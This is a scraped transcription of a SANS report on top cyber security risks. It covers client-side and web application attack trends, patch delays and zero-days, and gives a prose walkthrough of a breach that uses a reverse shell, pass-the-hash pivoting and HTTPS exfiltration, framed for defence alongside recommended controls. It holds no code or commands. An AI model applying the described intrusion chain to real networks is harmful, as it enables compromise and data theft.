Priority One: Client-side software that remains unpatched. Priority Two: Internet-facing web sites that are vulnerable.
|
|
- Myrtle Bailey
- 8 years ago
- Views:
Transcription
1 SANS: of 3 5/6/ :20 Priority One: Client-side software that remains unpatched. Waves of targeted attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites. (See Priority Two below for how they compromise the web sites). Because the visitors feel safe downloading documents from the trusted sites, they are easily fooled into opening documents and music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and also to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words the highest priority risk is getting less attention than the lower priority risk. Priority Two: Internet-facing web sites that are vulnerable. Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience. Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms. Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system. Excellent conference! Allows you to hit the ground running with effective skills and tools! Best security training in IT! -Russell Morrison, AXYS Rising numbers of zero-day vulnerabilities World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks. A large decline in the number of "PHP File Include" attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals. Next Section:
2 SANS: of 3 5/6/ :20 Application Vulnerabilities Exceed OS Vulnerabilities During the last few years, the number of vulnerabilities being discovered in applications is far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded on application programs. The most "popular" applications for exploitation tend to change over time since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted. Figure 1: Number of Vulnerabilities in Network, OS and Applications Web Application Attacks There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites. This instructor had an impressive, solid background and does an excellent job presenting the material in a way that geek wannabes can understand -Julie Stroud, U.S. Department of Energy Windows: Conficker/Downadup Attacks on Microsoft Windows operating systems were dominated by Conficker/ Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks. Fi 2 Att k C iti l Mi ft V l biliti (l t 6 th )
3 SANS: - Origin and Destination Analysis 2 of 6 5/6/ :21 Origin and Destination Analysis for Four Key Attacks Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. In order to show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two categories. However, the trends we see in separating this data is worth pointing out. The SQL Injection attacks that compose this category include "SQL Injection using SELECT SQL Statement", "SQL Injection Evasion using String Functions", and "SQL Injection using Boolean Identity". The most prominent "PHP Remote File Include attack" is one that looks for a very small HTTP request that includes a link to another website as a parameter that contains a very specific evasion technique used by a number of attacks to increase the reliability of their attacks. Also of note is a very specific attack against the "Zeroboard PHP" application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular "HTTP Connect Tunnel" attacks, which remains a staple in the Server-Side HTTP category. The HTTP connect tunnels are used for sending spam s via mis-configured HTTP servers. Looking at the breakdown by country we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5). The information presented is priceless! -Nehal Parmar, North Fork Bank Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months) For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise. An interesting spike in Server-Side HTTP attacks occurred in July This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Server Provider (ISP). In this case, there were a number of machines located at a single collocation site that may have all been compromised with the same vulnerability due to the machines being at the same patch level. In addition, a number of gambling sites took part in this attack which peaked after hours on July Fourth, a major holiday in the United States.
4 SANS: - Origin and Destination Analysis 3 of 6 5/6/ :21 Figure 6: Server-Side HTTP Attacks (last 6 months) Finally let's turn to the source of these HTTP Server-Side Attacks (Figure 7). Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months) Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude. The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge with the United States being both the top source of and destination for SQL Injection events. SQL Injection on the internet can more or less be divided into two sub-categories: Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the Internet still use "SQL Injection" for their normal functionality. It should be noted that this is only a difference in intent. The web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform Malicious SQL Injections. The servers that house these applications may have a higher compromise rate not only because they are known to be vulnerable, but also because they need to distinguish between legitimate and malicious injects to identify attacks.
5 SANS: - Origin and Destination Analysis 4 of 6 5/6/ :21 Figure 8: SQL Injection Attacks by Destination Country (last 6 months) Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section. A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August. Figure 9: SQL Injection Attacks (last 6 months) The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again the overwhelming destination for these events is in the United States. (Figure 10).
6 SANS: - Origin and Destination Analysis 5 of 6 5/6/ :21 Figure 10: SQL Injection Attacks by Source Country (last 6 months) In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted. Although "PHP File Include" attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attacks originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average. There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed.), attacks such as these are likely to remain popular for some time. Figure 11: PHP Remote File Include Attacks (last 6 months) Let us look at the sources of "PHP Remote File Include" attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.
7 SANS: - Origin and Destination Analysis 6 of 6 5/6/ :21 Figure 12: PHP Remote File Include Attacks by Source Country (last 6 months) Cross Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall in the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today's Web 2.0 world. Another very common "use" of XSS is by various advertisers' analytic systems. For example, an advertiser's banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser's HTTP server for tracking purposes. However, in this case, there is little risk because the site in question (usually) has full control over his/her page, so this request to the advertiser is not generally malicious. It is the "reflection" attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months. Figure 13: XSS Attacks by Source Country (last 6 months) Attacks sourced from the United States have been on a steady decline month-over-month. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events however have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely, Hong Kong, China and Taiwan have remained stable over the past three month periods in this category. Next Section: The SANS Institute Web Privacy Policy Web Contact Link to Us Press Room Trademark Usage Policy Contact us: (301) 654-SANS(7267) Monday - Friday 9am-8pm EST/EDT
8 SANS: - Application vs. Operating Sys of 4 5/6/ :21 Application Patching is Much Slower than Operating System Patching Qualys scanners collect anonymized data of detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and applications. A Top 30 ranking is used often to see if major changes occur in the most frequent vulnerabilities found. Here is the ranking for the first half of 2009 TH edited to remove irrelevant data points such as 0-day vulnerabilities. Description WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010) Sun Java Multiple Vulnerabilities ( and others) Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges(238905) Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967) Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01) Microsoft SMB Remote Code Execution Vulnerability (MS09-001) Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability Microsoft Excel Remote Code Execution Vulnerability (MS09-009) Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01) Sun Java JDK JRE Multiple Vulnerabilities (254569) Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067) Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017) Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069) Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070) Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074) Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028) Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072) Adobe Flash Player Multiple Vulnerabilities (APSB07-20) Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20) Third Party CAPICOM.DLL Remote Code Execution Vulnerability Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076) Adobe Flash Player Multiple Vulnerabilities (APSB07-12) Microsoft Office Remote Code Execution Vulnerability (MS08-055) Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06) Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051) Processing Font Vulnerability in JRE May Allow Elevation of Privileges(238666) Microsoft Office Could Allow Remote Code Execution (MS08-016) Adobe Acrobat/Reader "util.printf()" Buffer Overflow Vulnerability (APSB08-19) Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15) Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007) SANS provides an unbiased view of the technical issues we face today. -Mark Towers, Nokia Table 1: Qualys Top 30 in H Some of the vulnerabilities listed in the table get quickly addressed by IT administrators TH vulnerabilities in the base operating system class, for example, show a significant drop in even the first 15 days of their lifetime:
9 SANS: - Application vs. Operating Sys of 4 5/6/ :21 Figure 14: Microsoft OS Vulnerabilities But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader are very widely installed and so expose the many systems they run on to long lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during the weekends when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly. PowerPoint and Adobe Vulnerabilities Patching Cycles Figure 15: Microsoft Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long-tail", the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine. Adobe Flash has similar problems with the applications of its updates TH there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007: Figure 16: Flash Vulnerabilities Flash presents additional challenges: it does not have its automatic update mechanism and one needs to patch Internet Explorer in a separate step from other browsers. For users that have more than one browser installed, it is quite easy to forget to completely close Flash vulnerabilities and continue to be unwillingly vulnerable. One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also increasingly for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.
10 SANS: - Application vs. Operating Sys of 4 5/6/ :21 Figure 17: Sun Java Vulnerabilities Next Section: HTTP Client-Side Exploitation Example The SANS Institute Web Privacy Policy Web Contact Link to Us Press Room Trademark Usage Policy Contact us: (301) 654-SANS(7267) Monday - Friday 9am-8pm EST/EDT
11 SANS: - Tutorial: HTTP Client-Side Exploit 2 of 4 5/6/ :21 Real-Life HTTP Client-Side Exploitation Example This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization. In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: Exploitation of client-side software and pass-the-hash attacks against Windows machines. Step 0: Attacker Places Content on Trusted Site In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software. Step 1: Client-Side Exploitation In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, itunes, etc.), document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, Powerpoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges. This was an excellent class that lead us from manual disk operations all the way through some of the newest memory forensics. -Douglas Couch, Purdue University Step 2: Establish Reverse Shell Backdoor Using HTTPS In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network is concerned.
12 SANS: - Tutorial: HTTP Client-Side Exploit 3 of 4 5/6/ :21 Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot In Step 3, the attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system. In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine. Step 5: Pass the Hash to Compromise Domain Controller In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain. Steps 6 and 7: Exfiltration In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected. Next Section:
13 SANS: of 3 5/6/ :22 A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user. The "File Format Vulnerabilities" continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available "fuzzing" frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd party add-ons to these popular and wide-spread software suites, making the patching process more complex and increasing their potential value to attackers. The notable zero-day vulnerabilities during past 6 months were: Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE ) Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE ) Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE ) Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE ) Adobe Reader Remote Code Execution Vulnerability (CVE ) Microsoft PowerPoint Remote Code Execution Vulnerability (CVE ) The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people having skills to discover vulnerabilities world-wide. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources. For example, MS (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted remote IE 6/7 critical vulnerability on Oct 22, A second independent researcher submitted the same vulnerability on April 23, A third independent researcher submitted the same vulnerability on May 19, All three submissions outlined different approaches of auditing and finding the same vulnerability. The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch. Just amazing content and instruction, it's really a 'must do' for any info sec professional. -Mark Austin, PHH Mortgage This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities. Next Section:
14 SANS: - Best Practices 2 of 3 5/6/ :22 A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense. These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats. One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls to be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls and at the same time to help people who are implementing the Twenty Critical Security Controls to focus their attention on the elements of the controls that need to be completed most immediately. The Key Elements of these attacks and associated Controls: User applications have vulnerabilities that can be exploited remotely, Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched. There is an increasing number of zero-days in these types of applications, Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits. Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised, Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application. The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user. Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise. This course lays the foundation necessary to understand data storage, then jumps into using the latest tools available today to ensure immediate value upon returning to work -Dave Howard, Emerson Next Section:
15 SANS: of 3 5/6/ :22 Critical Controls as Applied to As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control. The Key Elements of these attacks and associated Controls: Web applications have vulnerabilities that can be easily discovered and exploited remotely include the following: Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner. Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server. Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications. [End] Ben's insight into legal issues and teaching style makes this potentially dry material exciting. His stories and examples add to the printed material -Karl Kurrle, Golf Savings Bank
The Top Cyber Security Risks Two risks dwarf all others, but organizations fail to mitigate them
The Top Cyber Security Risks Two risks dwarf all others, but organizations fail to mitigate them Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationDesktop Security. Overview and Technology Guidance. Michael Ramsey Network Specialist, NC DPI
Desktop Security Overview and Technology Guidance Michael Ramsey Network Specialist, NC DPI Desktop Security Best practices for both the technical type and the typical user Defensive Layering Top Vulnerabilities
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationSecurity Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationBasic Security Considerations for Email and Web Browsing
Basic Security Considerations for Email and Web Browsing There has been a significant increase in spear phishing and other such social engineering attacks via email in the last quarter of 2015, with notable
More informationINDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
More informationRecommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationSECURITY TERMS: Advisory Backdoor - Blended Threat Blind Worm Bootstrapped Worm Bot Coordinated Scanning
SECURITY TERMS: Advisory - A formal notice to the public on the nature of security vulnerability. When security researchers discover vulnerabilities in software, they usually notify the affected vendor
More informationWhat Do You Mean My Cloud Data Isn t Secure?
Kaseya White Paper What Do You Mean My Cloud Data Isn t Secure? Understanding Your Level of Data Protection www.kaseya.com As today s businesses transition more critical applications to the cloud, there
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationHow We're Getting Creamed
ed Attacks How We're Getting Creamed By Ed Skoudis June 9, 2011 ed Attacks - 2011 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996 working for
More informationIntegrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationCybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix
Cybercrime myths, challenges and how to protect our business Vladimir Kantchev Managing Partner Service Centrix Agenda Cybercrime today Sources and destinations of the attacks Breach techniques How to
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationBefore the DEPARTMENT OF COMMERCE Internet Policy Task Force
Before the DEPARTMENT OF COMMERCE Internet Policy Task Force In the Matter of Cybersecurity, Innovation Docket No. 100721305-0305-01 and the Internet Economy COMMENTS OF VeriSign, Inc Joe Waldron Director,
More informationModern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth
Modern Cyber Threats how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure Axel Wirth Healthcare Solutions Architect Distinguished Systems Engineer AAMI 2013 Conference
More informationHow To Manage Web Content Management System (Wcm)
WEB CONTENT MANAGEMENT SYSTEM February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationWEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project
WEB SECURITY Oriana Kondakciu 0054118 Software Engineering 4C03 Project The Internet is a collection of networks, in which the web servers construct autonomous systems. The data routing infrastructure
More informationANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
More informationSECURITY TRENDS & VULNERABILITIES REVIEW 2015
SECURITY TRENDS & VULNERABILITIES REVIEW 2015 Contents 1. Introduction...3 2. Executive summary...4 3. Inputs...6 4. Statistics as of 2014. Comparative study of results obtained in 2013...7 4.1. Overall
More informationTespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report
Tespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report About this Report This report was compiled and published by the Tespok icsirt in partnership with the Serianu Cyber Threat Intelligence
More informationNetwork and Host-based Vulnerability Assessment
Network and Host-based Vulnerability Assessment A guide for information systems and network security professionals 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free:
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationThe Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
